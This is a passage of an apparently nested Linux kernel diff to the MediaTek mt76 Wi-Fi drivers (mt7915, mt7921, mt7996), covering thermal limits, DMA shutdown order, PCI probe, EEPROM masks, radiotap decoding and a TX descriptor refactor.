+@@ -175,7 +179,7 @@ static void mt7915_unregister_thermal(struct mt7915_phy *phy)
+ 	struct wiphy *wiphy = phy->mt76->hw->wiphy;
+ 
+ 	if (!phy->cdev)
+-	    return;
++		return;
+ 
+ 	sysfs_remove_link(&wiphy->dev.kobj, "cooling_device");
+ 	thermal_cooling_device_unregister(phy->cdev);
+@@ -200,6 +204,10 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 			phy->cdev = cdev;
+ 	}
+ 
++	/* initialize critical/maximum high temperature */
++	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = MT7915_CRIT_TEMP;
++	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = MT7915_MAX_TEMP;
++
+ 	if (!IS_REACHABLE(CONFIG_HWMON))
+ 		return 0;
+ 
+@@ -208,10 +216,6 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 	if (IS_ERR(hwmon))
+ 		return PTR_ERR(hwmon);
+ 
+-	/* initialize critical/maximum high temperature */
+-	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = 110;
+-	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = 120;
+-
+ 	return 0;
+ }
+ 
+@@ -1111,7 +1115,6 @@ static void mt7915_stop_hardware(struct mt7915_dev *dev)
+ 		mt7986_wmac_disable(dev);
+ }
+ 
+-
+ int mt7915_register_device(struct mt7915_dev *dev)
+ {
+ 	struct ieee80211_hw *hw = mt76_hw(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+index e58650bbbd14a..942d70c538254 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+@@ -72,6 +72,8 @@
+ 
+ #define MT7915_CRIT_TEMP_IDX		0
+ #define MT7915_MAX_TEMP_IDX		1
++#define MT7915_CRIT_TEMP		110
++#define MT7915_MAX_TEMP			120
+ 
+ struct mt7915_vif;
+ struct mt7915_sta;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index 686c9bbd59293..7303b690a64dc 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -1237,6 +1237,8 @@ static const struct of_device_id mt7986_wmac_of_match[] = {
+ 	{},
+ };
+ 
++MODULE_DEVICE_TABLE(of, mt7986_wmac_of_match);
++
+ struct platform_driver mt7986_wmac_driver = {
+ 	.driver = {
+ 		.name = "mt7986-wmac",
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index d1f10f6d9adc3..fd57c87a29ae3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -66,6 +66,24 @@ static void mt7921_dma_prefetch(struct mt7921_dev *dev)
+ 
+ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ {
++	/* disable WFDMA0 */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
++		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
++		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
++		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
++
++	if (!mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++				 MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++				 MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1))
++		return -ETIMEDOUT;
++
++	/* disable dmashdl */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
++		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
++	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
++
+ 	if (force) {
+ 		/* reset */
+ 		mt76_clear(dev, MT_WFDMA0_RST,
+@@ -77,24 +95,6 @@ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ 			 MT_WFDMA0_RST_LOGIC_RST);
+ 	}
+ 
+-	/* disable dmashdl */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
+-		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
+-	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
+-
+-	/* disable WFDMA0 */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
+-		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
+-		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
+-		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+-
+-	if (!mt76_poll(dev, MT_WFDMA0_GLO_CFG,
+-		       MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
+-		       MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 1000))
+-		return -ETIMEDOUT;
+-
+ 	return 0;
+ }
+ 
+@@ -301,6 +301,10 @@ void mt7921_dma_cleanup(struct mt7921_dev *dev)
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+ 
++	mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++			    MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++			    MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1);
++
+ 	/* reset */
+ 	mt76_clear(dev, MT_WFDMA0_RST,
+ 		   MT_WFDMA0_RST_DMASHDL_ALL_RST |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index d4b681d7e1d22..f2c6ec4d8e2ee 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -162,12 +162,12 @@ mt7921_mac_init_band(struct mt7921_dev *dev, u8 band)
+ 
+ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ {
+-	struct mt7921_fw_features *features = NULL;
+ 	const struct mt76_connac2_fw_trailer *hdr;
+ 	struct mt7921_realease_info *rel_info;
+ 	const struct firmware *fw;
+ 	int ret, i, offset = 0;
+ 	const u8 *data, *end;
++	u8 offload_caps = 0;
+ 
+ 	ret = request_firmware(&fw, fw_wm, dev);
+ 	if (ret)
+@@ -199,7 +199,10 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 		data += sizeof(*rel_info);
+ 
+ 		if (rel_info->tag == MT7921_FW_TAG_FEATURE) {
++			struct mt7921_fw_features *features;
++
+ 			features = (struct mt7921_fw_features *)data;
++			offload_caps = features->data;
+ 			break;
+ 		}
+ 
+@@ -209,7 +212,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ out:
+ 	release_firmware(fw);
+ 
+-	return features ? features->data : 0;
++	return offload_caps;
+ }
+ EXPORT_SYMBOL_GPL(mt7921_check_offload_capability);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 744382be36f8b..b2366efd74ea5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1705,7 +1705,7 @@ static void mt7921_ctx_iter(void *priv, u8 *mac,
+ 	if (ctx != mvif->ctx)
+ 		return;
+ 
+-	if (vif->type & NL80211_IFTYPE_MONITOR)
++	if (vif->type == NL80211_IFTYPE_MONITOR)
+ 		mt7921_mcu_config_sniffer(mvif, ctx);
+ 	else
+ 		mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 7253ce90234ef..087a5dc2593db 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -16,24 +16,6 @@ static bool mt7921_disable_clc;
+ module_param_named(disable_clc, mt7921_disable_clc, bool, 0644);
+ MODULE_PARM_DESC(disable_clc, "disable CLC support");
+ 
+-static int
+-mt7921_mcu_parse_eeprom(struct mt76_dev *dev, struct sk_buff *skb)
+-{
+-	struct mt7921_mcu_eeprom_info *res;
+-	u8 *buf;
+-
+-	if (!skb)
+-		return -EINVAL;
+-
+-	skb_pull(skb, sizeof(struct mt76_connac2_mcu_rxd));
+-
+-	res = (struct mt7921_mcu_eeprom_info *)skb->data;
+-	buf = dev->eeprom.data + le32_to_cpu(res->addr);
+-	memcpy(buf, res->data, 16);
+-
+-	return 0;
+-}
+-
+ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 			      struct sk_buff *skb, int seq)
+ {
+@@ -60,8 +42,6 @@ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 	} else if (cmd == MCU_EXT_CMD(THERMAL_CTRL)) {
+ 		skb_pull(skb, sizeof(*rxd) + 4);
+ 		ret = le32_to_cpu(*(__le32 *)skb->data);
+-	} else if (cmd == MCU_EXT_CMD(EFUSE_ACCESS)) {
+-		ret = mt7921_mcu_parse_eeprom(mdev, skb);
+ 	} else if (cmd == MCU_UNI_CMD(DEV_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(BSS_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(STA_REC_UPDATE) ||
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index 5c23c827abe47..aa4ecf008a3c9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -115,9 +115,10 @@ static void mt7921e_unregister_device(struct mt7921_dev *dev)
+ 		napi_disable(&dev->mt76.napi[i]);
+ 	cancel_delayed_work_sync(&pm->ps_work);
+ 	cancel_work_sync(&pm->wake_work);
++	cancel_work_sync(&dev->reset_work);
+ 
+ 	mt7921_tx_token_put(dev);
+-	mt7921_mcu_drv_pmctrl(dev);
++	__mt7921_mcu_drv_pmctrl(dev);
+ 	mt7921_dma_cleanup(dev);
+ 	mt7921_wfsys_reset(dev);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -263,6 +264,7 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	struct mt76_dev *mdev;
+ 	u8 features;
+ 	int ret;
++	u16 cmd;
+ 
+ 	ret = pcim_enable_device(pdev);
+ 	if (ret)
+@@ -272,6 +274,11 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	pci_read_config_word(pdev, PCI_COMMAND, &cmd);
++	if (!(cmd & PCI_COMMAND_MEMORY)) {
++		cmd |= PCI_COMMAND_MEMORY;
++		pci_write_config_word(pdev, PCI_COMMAND, cmd);
++	}
+ 	pci_set_master(pdev);
+ 
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
+@@ -509,17 +516,7 @@ failed:
+ 
+ static void mt7921_pci_shutdown(struct pci_dev *pdev)
+ {
+-	struct mt76_dev *mdev = pci_get_drvdata(pdev);
+-	struct mt7921_dev *dev = container_of(mdev, struct mt7921_dev, mt76);
+-	struct mt76_connac_pm *pm = &dev->pm;
+-
+-	cancel_delayed_work_sync(&pm->ps_work);
+-	cancel_work_sync(&pm->wake_work);
+-
+-	/* chip cleanup before reboot */
+-	mt7921_mcu_drv_pmctrl(dev);
+-	mt7921_dma_cleanup(dev);
+-	mt7921_wfsys_reset(dev);
++	mt7921_pci_remove(pdev);
+ }
+ 
+ static DEFINE_SIMPLE_DEV_PM_OPS(mt7921_pm_ops, mt7921_pci_suspend, mt7921_pci_resume);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+index 5321d20dcdcbf..363a170efdda9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+@@ -270,7 +270,7 @@ static int mt7921u_probe(struct usb_interface *usb_intf,
+ 
+ 	ret = mt7921u_dma_init(dev, false);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hw = mt76_hw(dev);
+ 	/* check hw sg support in order to enable AMSDU */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
+index 8da599e0abeac..cfc48698539b3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
+@@ -31,11 +31,11 @@ enum mt7996_eeprom_field {
+ #define MT_EE_WIFI_CONF2_BAND_SEL		GENMASK(2, 0)
+ 
+ #define MT_EE_WIFI_CONF1_TX_PATH_BAND0		GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF2_TX_PATH_BAND1		GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF2_TX_PATH_BAND2		GENMASK(2, 0)
++#define MT_EE_WIFI_CONF2_TX_PATH_BAND1		GENMASK(2, 0)
++#define MT_EE_WIFI_CONF2_TX_PATH_BAND2		GENMASK(5, 3)
+ #define MT_EE_WIFI_CONF4_STREAM_NUM_BAND0	GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND1	GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND2	GENMASK(2, 0)
++#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND1	GENMASK(2, 0)
++#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND2	GENMASK(5, 3)
+ 
+ #define MT_EE_RATE_DELTA_MASK			GENMASK(5, 0)
+ #define MT_EE_RATE_DELTA_SIGN			BIT(6)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+index 0eb9e4d73f2c1..e643a27048f93 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+@@ -253,12 +253,9 @@ mt7996_mac_decode_he_radiotap_ru(struct mt76_rx_status *status,
+ 				 struct ieee80211_radiotap_he *he,
+ 				 __le32 *rxv)
+ {
+-	u32 ru_h, ru_l;
+-	u8 ru, offs = 0;
++	u32 ru, offs = 0;
+ 
+-	ru_l = le32_get_bits(rxv[0], MT_PRXV_HE_RU_ALLOC_L);
+-	ru_h = le32_get_bits(rxv[1], MT_PRXV_HE_RU_ALLOC_H);
+-	ru = (u8)(ru_l | ru_h << 4);
++	ru = le32_get_bits(rxv[0], MT_PRXV_HE_RU_ALLOC);
+ 
+ 	status->bw = RATE_INFO_BW_HE_RU;
+ 
+@@ -323,18 +320,23 @@ mt7996_mac_decode_he_mu_radiotap(struct sk_buff *skb, __le32 *rxv)
+ 
+ 	he_mu->flags2 |= MU_PREP(FLAGS2_BW_FROM_SIG_A_BW, status->bw) |
+ 			 MU_PREP(FLAGS2_SIG_B_SYMS_USERS,
+-				 le32_get_bits(rxv[2], MT_CRXV_HE_NUM_USER));
++				 le32_get_bits(rxv[4], MT_CRXV_HE_NUM_USER));
+ 
+-	he_mu->ru_ch1[0] = le32_get_bits(rxv[3], MT_CRXV_HE_RU0);
++	he_mu->ru_ch1[0] = le32_get_bits(rxv[16], MT_CRXV_HE_RU0) & 0xff;
+ 
+ 	if (status->bw >= RATE_INFO_BW_40) {
+ 		he_mu->flags1 |= HE_BITS(MU_FLAGS1_CH2_RU_KNOWN);
+-		he_mu->ru_ch2[0] = le32_get_bits(rxv[3], MT_CRXV_HE_RU1);
++		he_mu->ru_ch2[0] = le32_get_bits(rxv[16], MT_CRXV_HE_RU1) & 0xff;
+ 	}
+ 
+ 	if (status->bw >= RATE_INFO_BW_80) {
+-		he_mu->ru_ch1[1] = le32_get_bits(rxv[3], MT_CRXV_HE_RU2);
+-		he_mu->ru_ch2[1] = le32_get_bits(rxv[3], MT_CRXV_HE_RU3);
++		u32 ru_h, ru_l;
++
++		he_mu->ru_ch1[1] = le32_get_bits(rxv[16], MT_CRXV_HE_RU2) & 0xff;
++
++		ru_l = le32_get_bits(rxv[16], MT_CRXV_HE_RU3_L);
++		ru_h = le32_get_bits(rxv[17], MT_CRXV_HE_RU3_H) & 0x7;
++		he_mu->ru_ch2[1] = (u8)(ru_l | ru_h << 4);
+ 	}
+ }
+ 
+@@ -357,23 +359,23 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			 HE_BITS(DATA2_TXOP_KNOWN),
+ 	};
+ 	struct ieee80211_radiotap_he *he = NULL;
+-	u32 ltf_size = le32_get_bits(rxv[2], MT_CRXV_HE_LTF_SIZE) + 1;
++	u32 ltf_size = le32_get_bits(rxv[4], MT_CRXV_HE_LTF_SIZE) + 1;
+ 
+ 	status->flag |= RX_FLAG_RADIOTAP_HE;
+ 
+ 	he = skb_push(skb, sizeof(known));
+ 	memcpy(he, &known, sizeof(known));
+ 
+-	he->data3 = HE_PREP(DATA3_BSS_COLOR, BSS_COLOR, rxv[14]) |
+-		    HE_PREP(DATA3_LDPC_XSYMSEG, LDPC_EXT_SYM, rxv[2]);
+-	he->data4 = HE_PREP(DATA4_SU_MU_SPTL_REUSE, SR_MASK, rxv[11]);
+-	he->data5 = HE_PREP(DATA5_PE_DISAMBIG, PE_DISAMBIG, rxv[2]) |
++	he->data3 = HE_PREP(DATA3_BSS_COLOR, BSS_COLOR, rxv[9]) |
++		    HE_PREP(DATA3_LDPC_XSYMSEG, LDPC_EXT_SYM, rxv[4]);
++	he->data4 = HE_PREP(DATA4_SU_MU_SPTL_REUSE, SR_MASK, rxv[13]);
++	he->data5 = HE_PREP(DATA5_PE_DISAMBIG, PE_DISAMBIG, rxv[5]) |
+ 		    le16_encode_bits(ltf_size,
+ 				     IEEE80211_RADIOTAP_HE_DATA5_LTF_SIZE);
+ 	if (le32_to_cpu(rxv[0]) & MT_PRXV_TXBF)
+ 		he->data5 |= HE_BITS(DATA5_TXBF);
+-	he->data6 = HE_PREP(DATA6_TXOP, TXOP_DUR, rxv[14]) |
+-		    HE_PREP(DATA6_DOPPLER, DOPPLER, rxv[14]);
++	he->data6 = HE_PREP(DATA6_TXOP, TXOP_DUR, rxv[9]) |
++		    HE_PREP(DATA6_DOPPLER, DOPPLER, rxv[9]);
+ 
+ 	switch (mode) {
+ 	case MT_PHY_TYPE_HE_SU:
+@@ -382,22 +384,22 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			     HE_BITS(DATA1_BEAM_CHANGE_KNOWN) |
+ 			     HE_BITS(DATA1_BW_RU_ALLOC_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_BEAM_CHANGE, BEAM_CHNG, rxv[14]) |
+-			     HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
++		he->data3 |= HE_PREP(DATA3_BEAM_CHANGE, BEAM_CHNG, rxv[8]) |
++			     HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
+ 		break;
+ 	case MT_PHY_TYPE_HE_EXT_SU:
+ 		he->data1 |= HE_BITS(DATA1_FORMAT_EXT_SU) |
+ 			     HE_BITS(DATA1_UL_DL_KNOWN) |
+ 			     HE_BITS(DATA1_BW_RU_ALLOC_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
++		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
+ 		break;
+ 	case MT_PHY_TYPE_HE_MU:
+ 		he->data1 |= HE_BITS(DATA1_FORMAT_MU) |
+ 			     HE_BITS(DATA1_UL_DL_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
+-		he->data4 |= HE_PREP(DATA4_MU_STA_ID, MU_AID, rxv[7]);
++		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
++		he->data4 |= HE_PREP(DATA4_MU_STA_ID, MU_AID, rxv[8]);
+ 
+ 		mt7996_mac_decode_he_radiotap_ru(status, he, rxv);
+ 		mt7996_mac_decode_he_mu_radiotap(skb, rxv);
+@@ -408,10 +410,10 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			     HE_BITS(DATA1_SPTL_REUSE3_KNOWN) |
+ 			     HE_BITS(DATA1_SPTL_REUSE4_KNOWN);
+ 
+-		he->data4 |= HE_PREP(DATA4_TB_SPTL_REUSE1, SR_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE2, SR1_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE3, SR2_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE4, SR3_MASK, rxv[11]);
++		he->data4 |= HE_PREP(DATA4_TB_SPTL_REUSE1, SR_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE2, SR1_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE3, SR2_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE4, SR3_MASK, rxv[13]);
+ 
+ 		mt7996_mac_decode_he_radiotap_ru(status, he, rxv);
+ 		break;
+@@ -960,8 +962,9 @@ mt7996_mac_write_txwi_80211(struct mt7996_dev *dev, __le32 *txwi,
+ }
+ 
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+-			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+-			   struct ieee80211_key_conf *key, u32 changed)
++			   struct sk_buff *skb, struct mt76_wcid *wcid,
++			   struct ieee80211_key_conf *key, int pid,
++			   enum mt76_txq_id qid, u32 changed)
+ {
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+ 	struct ieee80211_vif *vif = info->control.vif;
+@@ -992,7 +995,7 @@ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 	} else if (beacon) {
+ 		p_fmt = MT_TX_TYPE_FW;
+ 		q_idx = MT_LMAC_BCN0;
+-	} else if (skb_get_queue_mapping(skb) >= MT_TXQ_PSD) {
++	} else if (qid >= MT_TXQ_PSD) {
+ 		p_fmt = MT_TX_TYPE_CT;
+ 		q_idx = MT_LMAC_ALTX0;
+ 	} else {
+@@ -1069,8 +1072,8 @@ int mt7996_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(tx_info->skb);
+ 	struct ieee80211_key_conf *key = info->control.hw_key;
+ 	struct ieee80211_vif *vif = info->control.vif;
++	struct mt76_connac_txp_common *txp;
+ 	struct mt76_txwi_cache *t;
+-	struct mt7996_txp *txp;
+ 	int id, i, pid, nbuf = tx_info->nbuf - 1;
+ 	bool is_8023 = info->flags & IEEE80211_TX_CTL_HW_80211_ENCAP;
+ 	u8 *txwi = (u8 *)txwi_ptr;
+@@ -1098,41 +1101,36 @@ int mt7996_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 		return id;
+ 
+ 	pid = mt76_tx_status_skb_add(mdev, wcid, tx_info->skb);
+-	memset(txwi_ptr, 0, MT_TXD_SIZE);
+-	/* Transmit non qos data by 802.11 header and need to fill txd by host*/
+-	if (!is_8023 || pid >= MT_PACKET_ID_FIRST)
+-		mt7996_mac_write_txwi(dev, txwi_ptr, tx_info->skb, wcid, pid,
+-				      key, 0);
++	mt7996_mac_write_txwi(dev, txwi_ptr, tx_info->skb, wcid, key,
++			      pid, qid, 0);
+ 
+-	txp = (struct mt7996_txp *)(txwi + MT_TXD_SIZE);
++	txp = (struct mt76_connac_txp_common *)(txwi + MT_TXD_SIZE);
+ 	for (i = 0; i < nbuf; i++) {
+-		txp->buf[i] = cpu_to_le32(tx_info->buf[i + 1].addr);
+-		txp->len[i] = cpu_to_le16(tx_info->buf[i + 1].len);
++		txp->fw.buf[i] = cpu_to_le32(tx_info->buf[i + 1].addr);
++		txp->fw.len[i] = cpu_to_le16(tx_info->buf[i + 1].len);
+ 	}
+-	txp->nbuf = nbuf;
+-
+-	txp->flags = cpu_to_le16(MT_CT_INFO_FROM_HOST);
++	txp->fw.nbuf = nbuf;
+ 
+-	if (!is_8023 || pid >= MT_PACKET_ID_FIRST)
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_APPLY_TXD);
++	txp->fw.flags =
++		cpu_to_le16(MT_CT_INFO_FROM_HOST | MT_CT_INFO_APPLY_TXD);
+ 
+ 	if (!key)
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_NONE_CIPHER_FRAME);
++		txp->fw.flags |= cpu_to_le16(MT_CT_INFO_NONE_CIPHER_FRAME);
+ 
+ 	if (!is_8023 && ieee80211_is_mgmt(hdr->frame_control))
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_MGMT_FRAME);
++		txp->fw.flags |= cpu_to_le16(MT_CT_INFO_MGMT_FRAME);
+ 
+ 	if (vif) {
+ 		struct mt7996_vif *mvif = (struct mt7996_vif *)vif->drv_priv;
+ 
+-		txp->bss_idx = mvif->mt76.idx;
++		txp->fw.bss_idx = mvif->mt76.idx;
+ 	}
+ 
+-	txp->token = cpu_to_le16(id);
++	txp->fw.token = cpu_to_le16(id);
+ 	if (test_bit(MT_WCID_FLAG_4ADDR, &wcid->flags))
+-		txp->rept_wds_wcid = cpu_to_le16(wcid->idx);
++		txp->fw.rept_wds_wcid = cpu_to_le16(wcid->idx);
+ 	else
+-		txp->rept_wds_wcid = cpu_to_le16(0xfff);
++		txp->fw.rept_wds_wcid = cpu_to_le16(0xfff);
+ 	tx_info->skb = DMA_DUMMY_DATA;
+ 
+ 	/* pass partial skb header to fw */
+@@ -1171,13 +1169,13 @@ mt7996_tx_check_aggr(struct ieee80211_sta *sta, __le32 *txwi)
+ static void
+ mt7996_txp_skb_unmap(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ {
+-	struct mt7996_txp *txp;
++	struct mt76_connac_txp_common *txp;
+ 	int i;
+ 
+ 	txp = mt7996_txwi_to_txp(dev, t);
+-	for (i = 0; i < txp->nbuf; i++)
+-		dma_unmap_single(dev->dev, le32_to_cpu(txp->buf[i]),
+-				 le16_to_cpu(txp->len[i]), DMA_TO_DEVICE);
++	for (i = 0; i < txp->fw.nbuf; i++)
++		dma_unmap_single(dev->dev, le32_to_cpu(txp->fw.buf[i]),
++				 le16_to_cpu(txp->fw.len[i]), DMA_TO_DEVICE);
+ }
+ 
+ static void
+@@ -1554,11 +1552,11 @@ void mt7996_tx_complete_skb(struct mt76_dev *mdev, struct mt76_queue_entry *e)
+ 
+ 	/* error path */
+ 	if (e->skb == DMA_DUMMY_DATA) {
++		struct mt76_connac_txp_common *txp;
+ 		struct mt76_txwi_cache *t;
+-		struct mt7996_txp *txp;
+ 
+ 		txp = mt7996_txwi_to_txp(mdev, e->txwi);
+-		t = mt76_token_put(mdev, le16_to_cpu(txp->token));
++		t = mt76_token_put(mdev, le16_to_cpu(txp->fw.token));
+ 		e->skb = t ? t->skb : NULL;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.h b/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
+index 9f68852012b9e..1404ded52104a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
+@@ -102,8 +102,7 @@ enum rx_pkt_type {
+ #define MT_PRXV_NSTS			GENMASK(10, 7)
+ #define MT_PRXV_TXBF			BIT(11)
+ #define MT_PRXV_HT_AD_CODE		BIT(12)
+-#define MT_PRXV_HE_RU_ALLOC_L		GENMASK(31, 28)
+-#define MT_PRXV_HE_RU_ALLOC_H		GENMASK(3, 0)
++#define MT_PRXV_HE_RU_ALLOC		GENMASK(30, 22)
+ #define MT_PRXV_RCPI3			GENMASK(31, 24)
+ #define MT_PRXV_RCPI2			GENMASK(23, 16)
+ #define MT_PRXV_RCPI1			GENMASK(15, 8)
+@@ -113,34 +112,32 @@ enum rx_pkt_type {
+ #define MT_PRXV_TX_MODE			GENMASK(14, 11)
+ #define MT_PRXV_FRAME_MODE		GENMASK(2, 0)
+ #define MT_PRXV_DCM			BIT(5)
+-#define MT_PRXV_NUM_RX			BIT(8, 6)
+ 
+ /* C-RXV */
+-#define MT_CRXV_HT_STBC			GENMASK(1, 0)
+-#define MT_CRXV_TX_MODE			GENMASK(7, 4)
+-#define MT_CRXV_FRAME_MODE		GENMASK(10, 8)
+-#define MT_CRXV_HT_SHORT_GI		GENMASK(14, 13)
+-#define MT_CRXV_HE_LTF_SIZE		GENMASK(18, 17)
